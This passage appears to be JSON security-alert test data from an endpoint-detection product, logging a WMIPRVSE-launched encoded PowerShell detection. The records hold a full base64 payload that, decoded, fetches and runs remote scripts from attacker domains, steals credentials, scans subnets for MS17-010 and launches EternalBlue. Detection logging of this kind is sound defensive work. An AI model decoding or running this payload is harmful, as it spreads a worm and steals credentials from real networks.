hAHMAcwAoACcAcgBvAG8AdABcAGQAZQBmAGEAdQBsAHQAOgBjAG8AcgBlAGQAcAB1AHMAcwB2AHIAJwApACAAIAANAAoAJABTAHQAYQB0AGkAYwBDAGwAYQBzAHMALgBTAGUAdABQAHIAbwBwAGUAcgB0AHkAVgBhAGwAdQBlACgAJwBpAHAAcwB1ACcAIAAsACQAaQBwAHMAdQApAA0ACgAkAFMAdABhAHQAaQBjAEMAbABhAHMAcwAuAFAAdQB0ACgAKQANAAoAJABTAHQAYQB0AGkAYwBDAGwAYQBzAHMALgBTAGUAdABQAHIAbwBwAGUAcgB0AHkAVgBhAGwAdQBlACgAJwBpADEANwAnACAALAAkAGkAMQA3ACkADQAKACQAUwB0AGEAdABpAGMAQwBsAGEAcwBzAC4AUAB1AHQAKAApAA=="],"cmd_line":"powershell.exe -NoP -NonI -W Hidden -E JABzAGUAPQBAACgAJwB1AHAAZABhAHQAZQAuAHcAaQBuAGQAbwB3AHMAZABlAGYAZQBuAGQAZQByAGgAbwBzAHQALgBjAGwAdQBiACcALAAnAGkAbgBmAG8ALgB3AGkAbgBkAG8AdwBzAGQAZQBmAGUAbgBkAGUAcgBoAG8AcwB0AC4AYwBsAHUAYgAnACwAJwA4ADcALgAxADIAMQAuADkAOAAuADIAMQA1ACcAKQANAAoAJABuAGkAYwA9ACcAdwB3AHcALgB3AGkAbgBkAG8AdwBzAGQAZQBmAGUAbgBkAGUAcgBoAG8AcwB0AC4AYwBsAHUAYgAnAA0ACgBmAG8AcgBlAGEAYwBoACgAJAB0ACAAaQBuACAAJABzAGUAKQANAAoAewANAAoAIAAgACAAIAAkAHAAaQBuAD0AdABlAHMAdAAtAGMAbwBuAG4AZQBjAHQAaQBvAG4AIAAkAHQADQAKACAAIAAgACAAaQBmACAAKAAkAHAAaQBuACAALQBuAGUAIAAkAG4AdQBsAGwAKQANAAoAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAJABuAGkAYwA9ACQAdAANAAoAIAAgACAAIAAgACAAIAAgAGIAcgBlAGEAawANAAoAIAAgACAAIAB9AA0ACgB9AA0ACgAkAG4AaQBjAD0AJABuAGkAYwArACIAOgA4ADAAMAAwACIADQAKACQAdgBlAHIAPQAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABOAGUAdAAuAFcAZQBiAEMAbABpAGUAbgB0ACkALgBEAG8AdwBuAGwAbwBhAGQAUwB0AHIAaQBuAGcAKAAiAGgAdAB0AHAAOgAvAC8AJABuAGkAYwAvAHYAZQByAC4AdAB4AHQAIgApAC4AVAByAGkAbQAoACkAIAANAAoAaQBmACgAJAB2AGUAcgAgAC0AbgBlACAAJABuAHUAbABsACkAewAgAA0ACgAgACAAIAAgAGkAZgAoACQAdgBlAHIAIAAtAG4AZQAgACgAWwBXAG0AaQBDAGwAYQBzAHMAXQAgACcAcgBvAG8AdABcAGQAZQBmAGEAdQBsAHQAOgBjAG8AcgBlAGQAcAB1AHMAcwB2AHIAJwApAC4AUAByAG8AcABlAHIAdABpAGUAcwBbACcAdgBlAHIAJwBdAC4AVgBhAGwAdQBlACkAewAgAA0ACgAgACAAIAAgACAAIAAgACAASQBFAFgAIAAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABOAGUAdAAuAFcAZQBiAEMAbABpAGUAbgB0ACkALgBEAG8AdwBuAGwAbwBhAGQAUwB0AHIAaQBuAGcAKAAiAGgAdAB0AHAAOgAvAC8AJABuAGkAYwAvAGkAbgBmAG8ANgAuAHAAcwAxACIAKQANAAoAIAAgACAAIAAgACAAIAAgAHIAZQB0AHUAcgBuACAADQAKACAAIAAgACAAfQAgAA0ACgB9AA0ACgAkAHMAdABpAG0AZQA9AFsARQBuAHYAaQByAG8AbgBtAGUAbgB0AF0AOgA6AFQAaQBjAGsAQwBvAHUAbgB0AA0ACgAkAGYAdQBuAHMAIAA9ACAAKABbAFcAbQBpAEMAbABhAHMAcwBdACAAJwByAG8AbwB0AFwAZABlAGYAYQB1AGwAdAA6AGMAbwByAGUAZABwAHUAcwBzAHYAcgAnACkALgBQAHIAbwBwAGUAcgB0AGkAZQBzAFsAJwBmAHUAbgBzACcAXQAuAFYAYQBsAHUAZQAgACAAIAAgACAAIAAgACAADQAKACQAZABlAGYAdQBuAD0AWwBTAHkAcwB0AGUAbQAuAFQAZQB4AHQALgBFAG4AYwBvAGQAaQBuAGcAXQA6ADoAQQBTAEMASQBJAC4ARwBlAHQAUwB0AHIAaQBuAGcAKABbAFMAeQBzAHQAZQBtAC4AQwBvAG4AdgBlAHIAdABdADoAOgBGAHIAbwBtAEIAYQBzAGUANgA0AFMAdAByAGkAbgBnACgAJABmAHUAbgBzACkAKQANAAoAaQBlAHgAIAAkAGQAZQBmAHUAbgANAAoADQAKAEcAZQB0AC0AVwBtAGkATwBiAGoAZQBjAHQAIABfAF8ARgBpAGwAdABlAHIAVABvAEMAbwBuAHMAdQBtAGUAcgBCAGkAbgBkAGkAbgBnACAALQBOAGEAbQBlAHMAcABhAGMAZQAgAHIAbwBvAHQAXABzAHUAYgBzAGMAcgBpAHAAdABpAG8AbgAgAHwAIABXAGgAZQByAGUALQBPAGIAagBlAGMAdAAgAHsAJABfAC4AZgBpAGwAdABlAHIAIAAtAG4AbwB0AG0AYQB0AGMAaAAgACcAUwB5AHMAdABlAG0AIABFAHYAZQBuAHQAcwAgAEwAbwBnACcAfQAgAHwAUgBlAG0AbwB2AGUALQBXAG0AaQBPAGIAagBlAGMAdAANAAoAJABkAGkAcgBwAGEAdABoAD0AJABlAG4AdgA6AFMAeQBzAHQAZQBtAFIAbwBvAHQAKwAnAFwAcwB5AHMAdABlAG0AMwAyACcAIAAgACAADQAKAGkAZgAgACAAKAAhACgAdABlAHMAdAAtAHAAYQB0AGgAIAAkAGQAaQByAHAAYQB0AGgAIAApACkAewANAAoACQAkAGQAaQByAHAAYQB0AGgAPQAkAGUAbgB2ADoAUwB5AHMAdABlAG0AUgBvAG8AdAANAAoAfQANAAoAaQBmACAAKAAhACgAdABlAHMAdAAtAHAAYQB0AGgAIAAoACQAZABpAHIAcABhAHQAaAArACcAXABtAHMAdgBjAHAAMQAyADAALgBkAGwAbAAnACkAKQApAA0ACgANAAoAewBzAGUAbgB0AGYAaQBsAGUAIAAoACQAZABpAHIAcABhAHQAaAArACcAXABtAHMAdgBjAHAAMQAyADAALgBkAGwAbAAnACkAIAAnAHYAYwBwACcAfQANAAoAaQBmACAAKAAhACgAdABlAHMAdAAtAHAAYQB0AGgAIAAoACQAZABpAHIAcABhAHQAaAArACcAXABtAHMAdgBjAHIAMQAyADAALgBkAGwAbAAnACkAKQApAA0ACgB7AHMAZQBuAHQAZgBpAGwAZQAgACgAJABkAGkAcgBwAGEAdABoACsAJwBcAG0AcwB2AGMAcgAxADIAMAAuAGQAbABsACcAKQAgACcAdgBjAHIAJwB9AA0ACgANAAoAWwBhAHIAcgBhAHkAXQAkAHAAcwBpAGQAcwA9ACAAZwBlAHQALQBwAHIAbwBjAGUAcwBzACAALQBuAGEAbQBlACAAcABvAHcAZQByAHMAaABlAGwAbAAgAHwAcwBvAHIAdAAgAGMAcAB1ACAALQBEAGUAcwBjAGUAbgBkAGkAbgBnAHwAIABGAG8AcgBFAGEAYwBoAC0ATwBiAGoAZQBjAHQAIAB7ACQAXwAuAGkAZAB9AA0ACgAkAHQAYwBwAGMAbwBuAG4AIAA9ACAAbgBlAHQAcwB0AGEAdAAgAC0AYQBuAG8AcAAgAHQAYwBwACAADQAKACQAZQB4AGkAcwB0AD0AJABGAGEAbABzAGUADQAKAGkAZgAgACgAJABwAHMAaQBkAHMAIAAtAG4AZQAgACQAbgB1AGwAbAAgACkADQAKAHsADQAKACAAIAAgACAAZgBvAHIAZQBhAGMAaAAgACgAJAB0ACAAaQBuACAAJAB0AGMAcABjAG8AbgBuACkADQAKACAAIAAgACAAewANAAoAIAAgACAAIAAgACAAIAAgACQAbABpAG4AZQAgAD0AJAB0AC4AcwBwAGwAaQB0ACgAJwAgACcAKQB8ACAAPwB7ACQAXwB9AA0ACgAgACAAIAAgACAAIAAgACAAaQBmACAAKAAkAGwAaQBuAGUAIAAtAGUAcQAgACQAbgB1AGwAbAApAA0ACgAgACAAIAAgACAAIAAgACAAewBjAG8AbgB0AGkAbgB1AGUAfQANAAoAIAAgACAAIAAgACAAIAAgAGkAZgAgACgAKAAkAHAAcwBpAGQAcwBbADAAXQAgAC0AZQBxACAAJABsAGkAbgBlAFsALQAxAF0AKQAgAC0AYQBuAGQAIAAkAHQALgBjAG8AbgB0AGEAaQBuAHMAKAAiAEUAUwBUAEEAQgBMAEkAUwBIAEUARAAiACkAIAAtAGEAbgBkACAAKAAkAHQALgBjAG8AbgB0AGEAaQBuAHMAKAAiADoAOAAwACAAIgApACAALQBvAHIAIAAkAHQALgBjAG8AbgB0AGEAaQBuAHMAKAAiADoAMQA0ADQANAA0ACIAKQApACAAKQANAAoAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACQAZQB4AGkAcwB0AD0AJAB0AHIAdQBlAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIABiAHIAZQBhAGsADQAKACAAIAAgACAAIAAgACAAIAB9AA0ACgAgACAAIAAgAH0ADQAKAH0ADQAKAEsAaQBsAGwAQgBvAHQAKAAnAGMAbwByAGUAZABwAHUAcwBzAHYAcgAnACkADQAKAGYAbwByAGUAYQBjAGgAIAAoACQAdAAgAGkAbgAgACQAdABjAHAAYwBvAG4AbgApAA0ACgAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAkAGwAaQBuAGUAIAA9ACQAdAAuAHMAcABsAGkAdAAoACcAIAAnACkAfAAgAD8AewAkAF8AfQANAAoAIAAgACAAIAAgACAAIAAgAGkAZgAgACgAIQAoACQAbABpAG4AZQAgAC0AaQBzACAAWwBhAHIAcgBhAHkAXQApACkAewBjAG8AbgB0AGkAbgB1AGUAfQANAAoAIAAgACAAIAAgACAAIAAgAGkAZgAgACgAKAAkAGwAaQBuAGUAWwAtADMAXQAgAC0AbgBlACAAJABuAHUAbABsACkAIAAtAGEAbgBkACAAJAB0AC4AYwBvAG4AdABhAGkAbgBzACgAIgBFAFMAVABBAEIATABJAFMASABFAEQAIgApACAALQBhAG4AZAAgACgAJABsAGkAbgBlAFsALQAzAF0ALgBjAG8AbgB0AGEAaQBuAHMAKAAiADoAMQAxADEAMQAiACkAIAAtAG8AcgAgACQAbABpAG4AZQBbAC0AMwBdAC4AYwBvAG4AdABhAGkAbgBzACgAIgA6ADIAMgAyADIAIgApACAALQBvAHIAIAAkAGwAaQBuAGUAWwAtADMAXQAuAGMAbwBuAHQAYQBpAG4AcwAoACIAOgAzADMAMwAzACIAKQAgAC0AbwByACAAJABsAGkAbgBlAFsALQAzAF0ALgBjAG8AbgB0AGEAaQBuAHMAKAAiADoANAA0ADQANAAiACkAIAAtAG8AcgAgACQAbABpAG4AZQBbAC0AMwBdAC4AYwBvAG4AdABhAGkAbgBzACgAIgA6ADUANQA1ADUAIgApACAALQBvAHIAIAAkAGwAaQBuAGUAWwAtADMAXQAuAGMAbwBuAHQAYQBpAG4AcwAoACIAOgA2ADYANgA2ACIAKQAgAC0AbwByACAAJABsAGkAbgBlAFsALQAzAF0ALgBjAG8AbgB0AGEAaQBuAHMAKAAiADoANwA3ADcANwAiACkAIAAtAG8AcgAgACQAbABpAG4AZQBbAC0AMwBdAC4AYwBvAG4AdABhAGkAbgBzACgAIgA6ADgAOAA4ADgAIgApACAALQBvAHIAIAAkAGwAaQBuAGUAWwAtADMAXQAuAGMAbwBuAHQAYQBpAG4AcwAoACIAOgA5ADkAOQA5ACIAKQAgAC0AbwByACAAJABsAGkAbgBlAFsALQAzAF0ALgBjAG8AbgB0AGEAaQBuAHMAKAAiADoAMQA0ADQAMwAzACIAKQAgAC0AbwByACAAJABsAGkAbgBlAFsALQAzAF0ALgBjAG8AbgB0AGEAaQBuAHMAKAAiADoANAA1ADUANgAwACIAKQAgAC0AbwByACAAJABsAGkAbgBlAFsALQAzAF0ALgBjAG8AbgB0AGEAaQBuAHMAKAAiADoANgA1ADMAMwAzACIAKQAgAC0AbwByACAAJABsAGkAbgBlAFsALQAzAF0ALgBjAG8AbgB0AGEAaQBuAHMAKAAiADoANQA1ADMAMwA1ACIAKQApACkADQAKACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAkAGUAdgBpAGQAPQAkAGwAaQBuAGUAWwAtADEAXQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAARwBlAHQALQBQAHIAbwBjAGUAcwBzACAALQBpAGQAIAAkAGUAdgBpAGQAIAB8ACAAcwB0AG8AcAAtAHAAcgBvAGMAZQBzAHMAIAAtAGYAbwByAGMAZQANAAoAIAAgACAAIAAgACAAIAAgAH0ADQAKACAAIAAgACAAfQANAAoAaQBmACAAKAAhACQAZQB4AGkAcwB0ACAALQBhAG4AZAAgACgAJABwAHMAaQBkAHMALgBjAG8AdQBuAHQAIAAtAGwAZQAgADgAKQApAA0ACgB7ACAAIAAgAA0ACgAgACAAIAAgACQAYwBtAGQAbQBvAG4APQAiAHAAbwB3AGUAcgBzAGgAZQBsAGwAIAAtAE4AbwBQACAALQBOAG8AbgBJACAALQBXACAASABpAGQAZABlAG4AIABgACIAYAAkAG0AbwBuACAAPQAgACgAWwBXAG0AaQBDAGwAYQBzAHMAXQAgACcAcgBvAG8AdABcAGQAZQBmAGEAdQBsAHQAOgBjAG8AcgBlAGQAcAB1AHMAcwB2AHIAJwApAC4AUAByAG8AcABlAHIAdABpAGUAcwBbACcAbQBvAG4AJwBdAC4AVgBhAGwAdQBlADsAYAAkAGYAdQBuAHMAIAA9ACAAKABbAFcAbQBpAEMAbABhAHMAcwBdACAAJwByAG8AbwB0AFwAZABlAGYAYQB1AGwAdAA6AGMAbwByAGUAZABwAHUAcwBzAHYAcgAnACkALgBQAHIAbwBwAGUAcgB0AGkAZQBzAFsAJwBmAHUAbgBzACcAXQAuAFYAYQBsAHUAZQAgADsAaQBlAHgAIAAoAFsAUwB5AHMAdABlAG0ALgBUAGUAeAB0AC4ARQBuAGMAbwBkAGkAbgBnAF0AOgA6AEEAUwBDAEkASQAuAEcAZQB0AFMAdAByAGkAbgBnACgAWwBTAHkAcwB0AGUAbQAuAEMAbwBuAHYAZQByAHQAXQA6ADoARgByAG8AbQBCAGEAcwBlADYANABTAHQAcgBpAG4AZwAoAGAAJABmAHUAbgBzACkAKQApADsASQBuAHYAbwBrAGUALQBDAG8AbQBtAGEAbgBkACAAIAAtAFMAYwByAGkAcAB0AEIAbABvAGMAawAgAGAAJABSAGUAbQBvAHQAZQBTAGMAcgBpAHAAdABCAGwAbwBjAGsAIAAtAEEAcgBnAHUAbQBlAG4AdABMAGkAcwB0ACAAQAAoAGAAJABtAG8AbgAsACAAYAAkAG0AbwBuACwAIAAnAFYAbwBpAGQAJwAsACAAMAAsACAAJwAnACwAIAAnACcAKQBgACIAIgANAAoAIAAgACAAIAAkAHYAYgBzACAAPQAgAE4AZQB3AC0ATwBiAGoAZQBjAHQAIAAtAEMAbwBtAE8AYgBqAGUAYwB0ACAAVwBTAGMAcgBpAHAAdAAuAFMAaABlAGwAbAANAAoACQAkAHYAYgBzAC4AcgB1AG4AKAAkAGMAbQBkAG0AbwBuACwAMAApACAAIAANAAoAfQANAAoADQAKACQATgBUAEwATQA9ACQARgBhAGwAcwBlAA0ACgAkAG0AaQBtAGkAIAA9ACAAKABbAFcAbQBpAEMAbABhAHMAcwBdACAAJwByAG8AbwB0AFwAZABlAGYAYQB1AGwAdAA6AGMAbwByAGUAZABwAHUAcwBzAHYAcgAnACkALgBQAHIAbwBwAGUAcgB0AGkAZQBzAFsAJwBtAGkAbQBpACcAXQAuAFYAYQBsAHUAZQAgAA0ACgAkAGEALAAgACQATgBUAEwATQA9ACAARwBlAHQALQBjAHIAZQBkAHMAIAAkAG0AaQBtAGkAIAAkAG0AaQBtAGkADQAKACAAIAAgACAAIAAgACAADQAKACQATgBlAHQAdwBvAHIAawBzACAAPQAgAEcAZQB0AC0AVwBtAGkATwBiAGoAZQBjAHQAIABXAGkAbgAzADIAXwBOAGUAdAB3AG8AcgBrAEEAZABhAHAAdABlAHIAQwBvAG4AZgBpAGcAdQByAGEAdABpAG8AbgAgAC0ARQBBACAAUwB0AG8AcAAgAHwAIAA/ACAAewAkAF8ALgBJAFAARQBuAGEAYgBsAGUAZAB9ACAAIAAgACAADQAKACQAaQBwAHMAdQAgAD0AIAAoAFsAVwBtAGkAQwBsAGEAcwBzAF0AIAAnAHIAbwBvAHQAXABkAGUAZgBhAHUAbAB0ADoAYwBvAHIAZQBkAHAAdQBzAHMAdgByACcAKQAuAFAAcgBvAHAAZQByAHQAaQBlAHMAWwAnAGkAcABzAHUAJwBdAC4AVgBhAGwAdQBlACAADQAKACQAaQAxADcAIAA9ACAAKABbAFcAbQBpAEMAbABhAHMAcwBdACAAJwByAG8AbwB0AFwAZABlAGYAYQB1AGwAdAA6AGMAbwByAGUAZABwAHUAcwBzAHYAcgAnACkALgBQAHIAbwBwAGUAcgB0AGkAZQBzAFsAJwBpADEANwAnAF0ALgBWAGEAbAB1AGUADQAKACQAcwBjAGIAYQA9ACAAKABbAFcAbQBpAEMAbABhAHMAcwBdACAAJwByAG8AbwB0AFwAZABlAGYAYQB1AGwAdAA6AGMAbwByAGUAZABwAHUAcwBzAHYAcgAnACkALgBQAHIAbwBwAGUAcgB0AGkAZQBzAFsAJwBzAGMAJwBdAC4AVgBhAGwAdQBlAA0ACgBbAGIAeQB0AGUAWwBdAF0AJABzAGMAPQBbAFMAeQBzAHQAZQBtAC4AQwBvAG4AdgBlAHIAdABdADoAOgBGAHIAbwBtAEIAYQBzAGUANgA0AFMAdAByAGkAbgBnACgAJABzAGMAYgBhACkAIAAgACAAIAAgAA0ACgBmAG8AcgBlAGEAYwBoACAAKAAkAE4AZQB0AHcAbwByAGsAIABpAG4AIAAkAE4AZQB0AHcAbwByAGsAcwApACAADQAKAHsAIAAgACAAIAAgACAAIAAgACAAIAAgACAADQAKACAAIAAgACAADQAKACAAIAAgACAAJABJAFAAQQBkAGQAcgBlAHMAcwAgACAAPQAgACQATgBlAHQAdwBvAHIAawAuAEkAcABBAGQAZAByAGUAcwBzAFsAMABdACAAIAANAAoACQBpAGYAIAAoACQASQBQAEEAZABkAHIAZQBzAHMAIAAtAG0AYQB0AGMAaAAgACcAXgAxADYAOQAuADIANQA0ACcAKQB7AGMAbwBuAHQAaQBuAHUAZQB9ACAACQANAAoAIAAgACAAIAAkAFMAdQBiAG4AZQB0AE0AYQBzAGsAIAAgAD0AIAAkAE4AZQB0AHcAbwByAGsALgBJAFAAUwB1AGIAbgBlAHQAWwAwAF0AIAAgAA0ACgAgACAAIAAgACQAaQBwAHMAPQBHAGUAdAAtAE4AZQB0AHcAbwByAGsAUgBhAG4AZwBlACAAJABJAFAAQQBkAGQAcgBlAHMAcwAgACQAUwB1AGIAbgBlAHQATQBhAHMAawANAAoACQAkAHQAYwBwAGMAbwBuAG4AIAA9ACAAbgBlAHQAcwB0AGEAdAAgAC0AYQBuAG8AcAAgAHQAYwBwACAADQAKAAkAZgBvAHIAZQBhAGMAaAAgACgAJAB0ACAAaQBuACAAJAB0AGMAcABjAG8AbgBuACkADQAKACAAIAAgACAAewANAAoAIAAgACAAIAAgACAAIAAgACQAbABpAG4AZQAgAD0AJAB0AC4AcwBwAGwAaQB0ACgAJwAgACcAKQB8ACAAPwB7ACQAXwB9AA0ACgAgACAAIAAgACAAIAAgACAAaQBmACAAKAAhACgAJABsAGkAbgBlACAALQBpAHMAIABbAGEAcgByAGEAeQBdACkAKQB7AGMAbwBuAHQAaQBuAHUAZQB9AA0ACgAJAAkAaQBmACAAKAAkAGwAaQBuAGUALgBjAG8AdQBuAHQAIAAtAGwAZQAgADQAKQB7AGMAbwBuAHQAaQBuAHUAZQB9AA0ACgAJAAkAJABpAD0AJABsAGkAbgBlAFsALQAzAF0ALgBzAHAAbABpAHQAKAAnADoAJwApAFsAMABdAA0ACgAgACAAIAAgACAAIAAgACAAaQBmACAAKAAgACgAJABsAGkAbgBlAFsALQAyAF0AIAAtAGUAcQAgACcARQBTAFQAQQBCAEwASQBTAEgARQBEACcAKQAgAC0AYQBuAGQAIAAgACgAJABpACAALQBuAGUAIAAnADEAMgA3AC4AMAAuADAALgAxACcAKQAgAC0AYQBuAGQAIAAoACQAaQBwAHMAIAAtAG4AbwB0AGMAbwBuAHQAYQBpAG4AcwAgACQAaQApACkADQAKACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAkAGkAcABzACsAPQAkAGkADQAKACAAIAAgACAAIAAgACAAIAB9AA0ACgAgACAAIAAgAH0ADQAKACAAIAAgACAAaQBmACAAKAAoAFsARQBuAHYAaQByAG8AbgBtAGUAbgB0AF0AOgA6AFQAaQBjAGsAQwBvAHUAbgB0AC0AJABzAHQAaQBtAGUAKQAvADEAMAAwADAAIAAtAGcAdAAgADUANAAwADAAKQB7AGIAcgBlAGEAawB9AA0ACgAgACAAIAAgAGYAbwByAGUAYQBjAGgAIAAoACQAaQBwACAAaQBuACAAJABpAHAAcwApAA0ACgAgACAAIAAgAHsAIAAgACAADQAKACAAIAAgACAAIAAgACAAIABpAGYAIAAoACgAWwBFAG4AdgBpAHIAbwBuAG0AZQBuAHQAXQA6ADoAVABpAGMAawBDAG8AdQBuAHQALQAkAHMAdABpAG0AZQApAC8AMQAwADAAMAAgAC0AZwB0ACAANQA0ADAAMAApAHsAYgByAGUAYQBrAH0ADQAKACAAIAAgACAAIAAgACAAIABpAGYAIAAoACQAaQBwACAALQBlAHEAIAAkAEkAUABBAGQAZAByAGUAcwBzACkAewBjAG8AbgB0AGkAbgB1AGUAfQAgACAAIAAgACAADQAKACAAIAAgACAAIAAgACAAIABpAGYAIAAoACgAVABlAHMAdAAtAEMAbwBuAG4AZQBjAHQAaQBvAG4AIAAkAGkAcAAgAC0AYwBvAHUAbgB0ACAAMQApACAALQBuAGUAIAAkAG4AdQBsAGwAIAAgAC0AYQBuAGQAIAAkAGkAcABzAHUAIAAtAG4AbwB0AGMAbwBuAHQAYQBpAG4AcwAgACQAaQBwACkAIAANAAoAIAAgACAAIAAgACAAIAAgAHsAIAAgACAADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACQAcgBlAD0AMAANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAaQBmACAAKAAkAGEALgBjAG8AdQBuAHQAIAAtAG4AZQAgADAAKQAgACAAIAAgACAAIAANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAewAkAHIAZQAgAD0AIAB0AGUAcwB0AC0AaQBwACAALQBpAHAAIAAkAGkAcAAgAC0AYwByAGUAZABzACAAJABhACAAIAAtAG4AaQBjACAAJABuAGkAYwAgAC0AbgB0AGwAbQAgACQATgBUAEwATQAgAH0ADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgAGkAZgAgACgAJAByAGUAIAAtAGUAcQAgADEAKQB7ACQAaQBwAHMAdQAgAD0AJABpAHAAcwB1ACAAKwAiACAAIgArACQAaQBwAH0ADQAKAAkACQAJAGUAbABzAGUADQAKAAkACQAJAHsADQAKAAkACQAJAAkAJAB2AHUAbAA9AFsAUABpAG4AZwBDAGEAcwB0AGwAZQAuAFMAYwBhAG4AbgBlAHIAcwAuAG0AMQA3AHMAYwBdADoAOgBTAGMAYQBuACgAJABpAHAAKQAJAAkACQAJAA0ACgAJAAkACQAJAGkAZgAgACgAJAB2AHUAbAAgAC0AYQBuAGQAIAAkAGkAMQA3ACAALQBuAG8AdABjAG8AbgB0AGEAaQBuAHMAIAAkAGkAcAApAA0ACgANAAoACQAJAAkACQB7AA0ACgAJAAkACQAJAAkAJAByAGUAcwA9AGUAYgA3ACAAJABpAHAAIAAkAHMAYwANAAoACQAJAAkACQAJAGkAZgAgACgAIQAoACQAcgBlAHMAIAAtAGUAcQAgACQAdAByAHUAZQApACkADQAKAAkACQAJAAkACQB7AGUAYgA4ACAAJABpAHAAIAAkAHMAYwB9AA0ACgAJAAkACQAJAAkAJABpADEANwAgAD0AIAAkAGkAMQA3ACAAKwAgACIAIAAiACsAJABpAHAADQAKAAkACQAJAAkAfQANAAoACQAJAAkAfQANAAoAIAAgACAAIAAgACAAIAAgAH0ADQAKACAAIAAgACAAfQANAAoAIAB9ACAAIAAgACAAIAAgACAADQAKACQAUwB0AGEAdABpAGMAQwBsAGEAcwBzAD0ATgBlAHcALQBPAGIAagBlAGMAdAAgAE0AYQBuAGEAZwBlAG0AZQBuAHQALgBNAGEAbgBhAGcAZQBtAGUAbgB0AEMAbABhAHMAcwAoACcAcgBvAG8AdABcAGQAZQBmAGEAdQBsAHQAOgBjAG8AcgBlAGQAcAB1AHMAcwB2AHIAJwApACAAIAANAAoAJABTAHQAYQB0AGkAYwBDAGwAYQBzAHMALgBTAGUAdABQAHIAbwBwAGUAcgB0AHkAVgBhAGwAdQBlACgAJwBpAHAAcwB1ACcAIAAsACQAaQBwAHMAdQApAA0ACgAkAFMAdABhAHQAaQBjAEMAbABhAHMAcwAuAFAAdQB0ACgAKQANAAoAJABTAHQAYQB0AGkAYwBDAGwAYQBzAHMALgBTAGUAdABQAHIAbwBwAGUAcgB0AHkAVgBhAGwAdQBlACgAJwBpADEANwAnACAALAAkAGkAMQA3ACkADQAKACQAUwB0AGEAdABpAGMAQwBsAGEAcwBzAC4AUAB1AHQAKAApAA==","parent_app":"WmiPrvSE.exe","parent_app_path":"C:\\Windows\\System32\\wbem","parent_pid":2236,"parent_puid":132461352663910600,"parent_user":"SYSTEM","parent_user_sid":"010100000000000512000000","pid":10724,"puid":132465072105597400,"ts":1602033881727175700,"user":"user@testdomain.com","user_sid":"010100000000000512000000"}}],"limited":false,"matched":1},"schema":"endpoint","schema_epoch":2,"sig_id":20190517123456,"sig_rev":5},"detection":"apde:20190517123456","end_ts":1610640884,"engine":"apde","id":"d2616Ab846","name":"WMIPRVSE Launched Encoded Powershell Command","observables":{"file":[{"md5":"a575a7610e5f003cc36df39e07c4ba7d","name":"powershell.exe","path":"C:\\Windows\\System32\\WindowsPowerShell\\v1.0","properties":{"copyright":"© Microsoft Corporation. All rights reserved.","file_version":"10.0.14409.1005","product":"Microsoft® Windows® Operating System","product_version":"10.0.14409.1005"},"sha1":"88e7cdc0b75364418e11b2c53f772085f1b61d1e","sha256":"006cef6ef6488721895d93e4cef7fa0709c2692d74bde1e22e2a8719b2a86218","size":443392,"type_id":1},{"md5":"d683c112190f4b4c6d477d693ee88e35","name":"WmiPrvSE.exe","path":"C:\\Windows\\System32\\wbem","properties":{"copyright":"© Microsoft Corporation. All rights reserved.","file_version":"10.0.14409.1005","product":"Microsoft® Windows® Operating System","product_version":"10.0.14409.1005"},"sha1":"67858ead93feed62c0b1865369840e6e8086f53b","sha256":"385892542cc5a996488262b193061feac4615d66657157c3d4a76251911da334","size":425984,"type_id":1}]},"remediated":false,"severity":"medium","silent":false,"start_ts":1610640884,"tactics":["TA0002","TA0005","TA0008"],"type":"activity","normalized":{"observables":{"file":{"name":["powershell.exe","wmiprvse.exe"],"path":["c:\\windows\\system32\\windowspowershell\\v1.0","c:\\windows\\system32\\wbem"]}},"name":"wmiprvse launched encoded powershell command"},"ts":1610640884},"tactics":["TA0002","TA0005","TA0008"]}} +{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6880683125978957000,"timestamp":1610640884,"timestamp_nanoseconds":810000000,"date":"2021-01-14T16:14:44+00:00","event_type":"Threat Detection","event_type_id":553648222,"detection":"WMIPRVSE Launched Encoded Powershell Command","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_BP_WMIPRVSE","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"be:b0:d5:89:e2:96"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"bp_data":{"audit":false,"details":{"actions":[{"action":"end_process","end_ts":1602033881808,"params":["10724"],"start_ts":1602033881805,"status":"success"}],"eng_epoch":1,"eng_ver":"0.9.0.104","matched_activity":{"events":[{"process:start":{"app":"powershell.exe","app_path":"C:\\Windows\\System32\\WindowsPowerShell\\v1.0","args":["powershell.exe","-NoP","-NonI","-W","Hidden","-E","JABzAGUAPQBAACgAJwB1AHAAZABhAHQAZQAuAHcAaQBuAGQAbwB3AHMAZABlAGYAZQBuAGQAZQByAGgAbwBzAHQALgBjAGwAdQBiACcALAAnAGkAbgBmAG8ALgB3AGkAbgBkAG8AdwBzAGQAZQBmAGUAbgBkAGUAcgBoAG8AcwB0AC4AYwBsAHUAYgAnACwAJwA4ADcALgAxADIAMQAuADkAOAAuADIAMQA1ACcAKQANAAoAJABuAGkAYwA9ACcAdwB3AHcALgB3AGkAbgBkAG8AdwBzAGQAZQBmAGUAbgBkAGUAcgBoAG8AcwB0AC4AYwBsAHUAYgAnAA0ACgBmAG8AcgBlAGEAYwBoACgAJAB0ACAAaQBuACAAJABzAGUAKQANAAoAewANAAoAIAAgACAAIAAkAHAAaQBuAD0AdABlAHMAdAAtAGMAbwBuAG4AZQBjAHQAaQBvAG4AIAAkAH